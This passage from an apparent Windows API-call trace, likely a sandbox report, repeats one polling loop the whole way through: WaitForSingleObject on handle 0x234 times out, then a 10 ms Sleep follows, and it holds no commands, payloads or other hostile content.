(hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0131.392] Sleep (dwMilliseconds=0xa) [0131.548] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0131.549] Sleep (dwMilliseconds=0xa) [0131.753] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0131.753] Sleep (dwMilliseconds=0xa) [0132.018] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0132.018] Sleep (dwMilliseconds=0xa) [0132.226] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0132.226] Sleep (dwMilliseconds=0xa) [0132.423] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0132.424] Sleep (dwMilliseconds=0xa) [0132.726] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0132.726] Sleep (dwMilliseconds=0xa) [0132.910] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0132.910] Sleep (dwMilliseconds=0xa) [0133.116] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0133.116] Sleep (dwMilliseconds=0xa) [0133.354] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0133.354] Sleep (dwMilliseconds=0xa) [0133.503] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0133.503] Sleep (dwMilliseconds=0xa) [0133.675] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0133.676] Sleep (dwMilliseconds=0xa) [0133.816] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0133.817] Sleep (dwMilliseconds=0xa) [0133.960] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0133.960] Sleep (dwMilliseconds=0xa) [0134.153] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0134.153] Sleep (dwMilliseconds=0xa) [0134.398] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0134.398] Sleep (dwMilliseconds=0xa) [0134.461] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0134.461] Sleep (dwMilliseconds=0xa) [0134.541] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0134.541] Sleep (dwMilliseconds=0xa) [0134.684] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0134.684] Sleep (dwMilliseconds=0xa) [0134.855] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0134.855] Sleep (dwMilliseconds=0xa) [0134.885] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0134.885] Sleep (dwMilliseconds=0xa) [0135.107] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0135.107] Sleep (dwMilliseconds=0xa) [0135.252] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0135.252] Sleep (dwMilliseconds=0xa) [0135.565] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0135.565] Sleep (dwMilliseconds=0xa) [0135.755] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0135.755] Sleep (dwMilliseconds=0xa) [0135.920] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0135.920] Sleep (dwMilliseconds=0xa) [0136.098] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0136.098] Sleep (dwMilliseconds=0xa) [0136.273] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0136.273] Sleep (dwMilliseconds=0xa) [0136.462] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0136.462] Sleep (dwMilliseconds=0xa) [0136.586] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0136.586] Sleep (dwMilliseconds=0xa) [0136.694] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0136.694] Sleep (dwMilliseconds=0xa) [0136.789] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0136.789] Sleep (dwMilliseconds=0xa) [0136.866] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0136.867] Sleep (dwMilliseconds=0xa) [0136.953] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0136.953] Sleep (dwMilliseconds=0xa) [0137.063] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.063] Sleep (dwMilliseconds=0xa) [0137.152] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.202] Sleep (dwMilliseconds=0xa) [0137.280] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.280] Sleep (dwMilliseconds=0xa) [0137.415] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.415] Sleep (dwMilliseconds=0xa) [0137.586] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.586] Sleep (dwMilliseconds=0xa) [0137.716] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.716] Sleep (dwMilliseconds=0xa) [0137.804] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.804] Sleep (dwMilliseconds=0xa) [0137.854] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.854] Sleep (dwMilliseconds=0xa) [0137.895] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0137.895] Sleep (dwMilliseconds=0xa) [0138.042] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.042] Sleep (dwMilliseconds=0xa) [0138.080] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.080] Sleep (dwMilliseconds=0xa) [0138.127] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.127] Sleep (dwMilliseconds=0xa) [0138.162] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.162] Sleep (dwMilliseconds=0xa) [0138.224] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.224] Sleep (dwMilliseconds=0xa) [0138.262] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.262] Sleep (dwMilliseconds=0xa) [0138.332] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.332] Sleep (dwMilliseconds=0xa) [0138.350] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.350] Sleep (dwMilliseconds=0xa) [0138.375] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.375] Sleep (dwMilliseconds=0xa) [0138.566] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.566] Sleep (dwMilliseconds=0xa) [0138.949] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0138.949] Sleep (dwMilliseconds=0xa) [0139.175] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0139.175] Sleep (dwMilliseconds=0xa) [0139.352] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0139.352] Sleep (dwMilliseconds=0xa) [0139.471] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0139.471] Sleep (dwMilliseconds=0xa) [0139.643] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0139.643] Sleep (dwMilliseconds=0xa) [0139.744] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0139.744] Sleep (dwMilliseconds=0xa) [0139.901] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0139.901] Sleep (dwMilliseconds=0xa) [0139.984] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0139.984] Sleep (dwMilliseconds=0xa) [0140.085] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0140.085] Sleep (dwMilliseconds=0xa) [0140.252] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0140.252] Sleep (dwMilliseconds=0xa) [0140.352] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0140.354] Sleep (dwMilliseconds=0xa) [0140.543] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0140.543] Sleep (dwMilliseconds=0xa) [0140.676] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0140.676] Sleep (dwMilliseconds=0xa) [0140.926] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0140.926] Sleep (dwMilliseconds=0xa) [0141.040] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0141.040] Sleep (dwMilliseconds=0xa) [0141.178] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0141.178] Sleep (dwMilliseconds=0xa) [0141.347] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0141.347] Sleep (dwMilliseconds=0xa) [0141.500] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0141.500] Sleep (dwMilliseconds=0xa) [0141.627] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0141.627] Sleep (dwMilliseconds=0xa) [0141.745] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0141.745] Sleep (dwMilliseconds=0xa) [0141.855] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0141.855] Sleep (dwMilliseconds=0xa) [0141.964] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0141.965] Sleep (dwMilliseconds=0xa) [0142.253] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0142.253] Sleep (dwMilliseconds=0xa) [0142.431] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0142.431] Sleep (dwMilliseconds=0xa) [0142.536] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0142.536] Sleep (dwMilliseconds=0xa) [0142.658] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0142.658] Sleep (dwMilliseconds=0xa) [0144.262] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0144.262] Sleep (dwMilliseconds=0xa) [0144.490] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0144.490] Sleep (dwMilliseconds=0xa) [0144.692] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0144.692] Sleep (dwMilliseconds=0xa) [0144.831] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0144.831] Sleep (dwMilliseconds=0xa) [0144.984] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0144.984] Sleep (dwMilliseconds=0xa) [0145.102] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0145.102] Sleep (dwMilliseconds=0xa) [0145.337] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0145.337] Sleep (dwMilliseconds=0xa) [0145.475] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0145.475] Sleep (dwMilliseconds=0xa) [0145.678] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0145.678] Sleep (dwMilliseconds=0xa) [0145.881] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0145.881] Sleep (dwMilliseconds=0xa) [0146.144] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0146.144] Sleep (dwMilliseconds=0xa) [0146.290] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0146.290] Sleep (dwMilliseconds=0xa) [0146.448] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0146.448] Sleep (dwMilliseconds=0xa) [0146.963] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0146.964] Sleep (dwMilliseconds=0xa) [0147.158] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0147.158] Sleep (dwMilliseconds=0xa) [0147.281] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0147.281] Sleep (dwMilliseconds=0xa) [0147.404] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0147.404] Sleep (dwMilliseconds=0xa) [0147.500] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0147.500] Sleep (dwMilliseconds=0xa) [0147.645] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0147.645] Sleep (dwMilliseconds=0xa) [0147.777] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0147.777] Sleep (dwMilliseconds=0xa) [0148.117] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0148.117] Sleep (dwMilliseconds=0xa) [0148.261] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0148.261] Sleep (dwMilliseconds=0xa) [0148.500] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0148.500] Sleep (dwMilliseconds=0xa) [0148.694] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0148.694] Sleep (dwMilliseconds=0xa) [0148.881] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0148.881] Sleep (dwMilliseconds=0xa) [0149.104] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0149.104] Sleep (dwMilliseconds=0xa) [0149.322] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0149.322] Sleep (dwMilliseconds=0xa) [0149.483] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0149.483] Sleep (dwMilliseconds=0xa) [0149.857] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0149.857] Sleep (dwMilliseconds=0xa) [0150.209] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0150.209] Sleep (dwMilliseconds=0xa) [0150.412] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0150.412] Sleep (dwMilliseconds=0xa) [0150.560] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0150.560] Sleep (dwMilliseconds=0xa) [0150.709] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0150.709] Sleep (dwMilliseconds=0xa) [0150.948] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0150.948] Sleep (dwMilliseconds=0xa) [0151.124] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0151.124] Sleep (dwMilliseconds=0xa) [0151.340] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0151.340] Sleep (dwMilliseconds=0xa) [0151.546] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0151.546] Sleep (dwMilliseconds=0xa) [0151.759] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0151.760] Sleep (dwMilliseconds=0xa) [0151.954] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0151.954] Sleep (dwMilliseconds=0xa) [0152.185] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0152.185] Sleep (dwMilliseconds=0xa) [0152.414] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0152.414] Sleep (dwMilliseconds=0xa) [0152.551] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0152.552] Sleep (dwMilliseconds=0xa) [0152.660] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0152.660] Sleep (dwMilliseconds=0xa) [0152.789] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0152.789] Sleep (dwMilliseconds=0xa) [0152.903] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0152.903] Sleep (dwMilliseconds=0xa) [0153.104] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.105] Sleep (dwMilliseconds=0xa) [0153.199] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.199] Sleep (dwMilliseconds=0xa) [0153.335] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.335] Sleep (dwMilliseconds=0xa) [0153.433] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.433] Sleep (dwMilliseconds=0xa) [0153.532] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.532] Sleep (dwMilliseconds=0xa) [0153.611] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.611] Sleep (dwMilliseconds=0xa) [0153.708] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.708] Sleep (dwMilliseconds=0xa) [0153.829] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.829] Sleep (dwMilliseconds=0xa) [0153.946] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0153.946] Sleep (dwMilliseconds=0xa) [0154.153] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.153] Sleep (dwMilliseconds=0xa) [0154.197] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.197] Sleep (dwMilliseconds=0xa) [0154.243] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.243] Sleep (dwMilliseconds=0xa) [0154.281] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.281] Sleep (dwMilliseconds=0xa) [0154.316] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.316] Sleep (dwMilliseconds=0xa) [0154.352] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.352] Sleep (dwMilliseconds=0xa) [0154.458] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.458] Sleep (dwMilliseconds=0xa) [0154.503] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.503] Sleep (dwMilliseconds=0xa) [0154.646] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.647] Sleep (dwMilliseconds=0xa) [0154.694] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.694] Sleep (dwMilliseconds=0xa) [0154.733] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.733] Sleep (dwMilliseconds=0xa) [0154.768] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.768] Sleep (dwMilliseconds=0xa) [0154.821] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.821] Sleep (dwMilliseconds=0xa) [0154.910] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.910] Sleep (dwMilliseconds=0xa) [0154.967] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0154.967] Sleep (dwMilliseconds=0xa) [0155.085] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0155.085] Sleep (dwMilliseconds=0xa) [0155.133] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0155.133] Sleep (dwMilliseconds=0xa) [0155.167] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0155.167] Sleep (dwMilliseconds=0xa) [0155.447] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0155.447] Sleep (dwMilliseconds=0xa) [0155.573] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0155.573] Sleep (dwMilliseconds=0xa) [0156.192] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0156.192] Sleep (dwMilliseconds=0xa) [0156.457] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0156.457] Sleep (dwMilliseconds=0xa) [0156.601] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0156.601] Sleep (dwMilliseconds=0xa) [0156.754] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0156.754] Sleep (dwMilliseconds=0xa) [0156.981] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0156.981] Sleep (dwMilliseconds=0xa) [0157.133] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0157.134] Sleep (dwMilliseconds=0xa) [0157.330] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0157.330] Sleep (dwMilliseconds=0xa) [0157.582] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0157.582] Sleep (dwMilliseconds=0xa) [0157.772] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0157.772] Sleep (dwMilliseconds=0xa) [0157.977] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0157.977] Sleep (dwMilliseconds=0xa) [0158.196] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0158.196] Sleep (dwMilliseconds=0xa) [0158.405] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0158.405] Sleep (dwMilliseconds=0xa) [0158.597] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0158.597] Sleep (dwMilliseconds=0xa) [0158.785] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0158.785] Sleep (dwMilliseconds=0xa) [0158.934] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0158.934] Sleep (dwMilliseconds=0xa) [0159.312] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0159.312] Sleep (dwMilliseconds=0xa) [0159.402] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0159.402] Sleep (dwMilliseconds=0xa) [0159.716] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0159.716] Sleep (dwMilliseconds=0xa) [0160.005] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0160.006] Sleep (dwMilliseconds=0xa) [0160.642] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0160.642] Sleep (dwMilliseconds=0xa) [0161.006] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0161.006] Sleep (dwMilliseconds=0xa) [0161.260] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0161.260] Sleep (dwMilliseconds=0xa) [0161.419] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0161.419] Sleep (dwMilliseconds=0xa) [0161.667] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0161.667] Sleep (dwMilliseconds=0xa) [0161.869] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0161.869] Sleep (dwMilliseconds=0xa) [0162.144] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0162.144] Sleep (dwMilliseconds=0xa) [0162.304] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0162.304] Sleep (dwMilliseconds=0xa) [0162.534] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0162.534] Sleep (dwMilliseconds=0xa) [0162.726] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0162.726] Sleep (dwMilliseconds=0xa) [0162.935] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0162.935] Sleep (dwMilliseconds=0xa) [0163.116] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0163.116] Sleep (dwMilliseconds=0xa) [0165.003] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0165.003] Sleep (dwMilliseconds=0xa) [0165.285] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0165.285] Sleep (dwMilliseconds=0xa) [0165.488] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0165.488] Sleep (dwMilliseconds=0xa) [0165.859] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0165.859] Sleep (dwMilliseconds=0xa) [0165.970] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0165.970] Sleep (dwMilliseconds=0xa) [0166.140] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0166.140] Sleep (dwMilliseconds=0xa) [0166.380] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0166.380] Sleep (dwMilliseconds=0xa) [0166.553] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0166.553] Sleep (dwMilliseconds=0xa) [0166.883] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0166.883] Sleep (dwMilliseconds=0xa) [0167.259] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0167.259] Sleep (dwMilliseconds=0xa) [0167.508] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0167.508] Sleep (dwMilliseconds=0xa) [0167.751] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0167.751] Sleep (dwMilliseconds=0xa) [0167.917] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0167.917] Sleep (dwMilliseconds=0xa) [0168.069] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0168.069] Sleep (dwMilliseconds=0xa) [0168.426] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0168.426] Sleep (dwMilliseconds=0xa) [0168.874] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0168.874] Sleep (dwMilliseconds=0xa) [0168.988] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0168.988] Sleep (dwMilliseconds=0xa) [0169.212] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0169.212] Sleep (dwMilliseconds=0xa) [0169.397] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0169.397] Sleep (dwMilliseconds=0xa) [0169.597] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0169.597] Sleep (dwMilliseconds=0xa) [0169.897] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0169.897] Sleep (dwMilliseconds=0xa) [0170.143] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0170.143] Sleep (dwMilliseconds=0xa) [0170.361] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0170.362] Sleep (dwMilliseconds=0xa) [0170.576] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0170.576] Sleep (dwMilliseconds=0xa) [0170.970] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0170.970] Sleep (dwMilliseconds=0xa) [0171.200] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0171.200] Sleep (dwMilliseconds=0xa) [0171.389] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0171.389] Sleep (dwMilliseconds=0xa) [0171.556] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0171.556] Sleep (dwMilliseconds=0xa) [0171.938] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0171.938] Sleep (dwMilliseconds=0xa) [0172.095] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0172.095] Sleep (dwMilliseconds=0xa) [0172.260] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0172.260] Sleep (dwMilliseconds=0xa) [0172.418] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0172.418] Sleep (dwMilliseconds=0xa) [0172.578] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0172.578] Sleep (dwMilliseconds=0xa) [0172.787] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 